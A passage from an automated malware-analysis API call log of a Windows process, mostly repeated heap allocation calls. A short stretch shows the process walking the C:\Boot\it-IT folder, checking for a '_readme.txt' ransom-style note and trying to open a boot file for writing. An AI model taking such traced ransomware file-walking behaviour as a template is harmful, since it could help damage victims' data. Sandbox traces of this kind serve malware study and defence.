Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.773] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.773] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.774] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.774] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.775] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.775] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0146.775] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.776] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.776] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.776] PathFindFileNameW (pszPath="") returned="" [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.776] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.776] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.776] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.776] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.776] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.776] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328f498 [0146.776] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.777] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.777] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.777] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.777] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.777] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0146.777] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.777] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.777] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.777] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned=".txt" [0146.777] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.777] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.777] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.778] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.778] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.778] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.778] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.779] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.779] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.780] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.780] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, 